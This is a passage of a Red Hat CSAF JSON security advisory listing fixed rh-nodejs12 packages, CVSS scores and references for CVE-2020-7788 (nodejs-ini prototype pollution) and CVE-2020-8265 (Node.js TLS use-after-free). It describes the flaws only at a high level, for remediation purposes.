"Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-11T13:37:42+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0485" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-8265", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912854" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure. This may be exploited to corrupt memory leading to a Denial of Service or potentially other exploits.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: use-after-free in the TLS implementation", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8265" }, { "category": "external", "summary": "RHBZ#1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8265", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8265" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265" }, { "category": "external", "summary": "https://hackerone.com/reports/988103", "url": "https://hackerone.com/reports/988103" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-11T13:37:42+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", 